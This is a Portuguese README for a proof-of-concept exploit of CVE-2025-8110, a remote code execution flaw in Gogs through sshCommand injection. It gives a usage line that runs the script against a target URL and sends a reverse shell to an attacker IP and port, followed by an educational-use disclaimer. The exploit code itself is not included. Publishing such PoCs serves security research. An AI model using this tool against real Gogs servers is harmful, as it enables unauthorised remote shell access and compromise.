
PoC do CVE-2025-8110
Este repositório contém uma Prova de Conceito (PoC) para o CVE-2025-8110, uma vulnerabilidade de Execução Remota de Código (RCE) no Gogs. O exploit tem como alvo a implementação do servidor SSH interno, permitindo que atacantes injetem comandos maliciosos por meio da configuração sshCommand.
Para executar o exploit, utilize o script CVE-2025-8110.py com a URL do Gogs de destino e o seu host/porta de escuta para o shell reverso.
python3 CVE-2025-8110.py -u <TARGET_URL> -lh <ATTACKER_IP> -lp <ATTACKER_PORT>
-u, --url: URL base da instância do Gogs alvo (ex.: http://localhost:3000).-lh, --host: Endereço IP para o qual o shell reverso deve se conectar.-lp, --port: Porta para a qual o shell reverso deve se conectar.-x, --proxy: (Opcional) Use um proxy local em http://localhost:8080 para depuração.Esta Prova de Conceito (PoC) tem finalidade exclusivamente educacional e de pesquisa. Destina-se a ajudar pesquisadores de segurança e administradores a compreender e mitigar a vulnerabilidade CVE-2025-8110.
O autor não se responsabiliza por qualquer uso não autorizado ou malicioso deste código. Utilize esta ferramenta apenas em sistemas seus ou para os quais você tenha permissão explícita para testar. Ao usar este código, você concorda em assumir total responsabilidade por suas ações.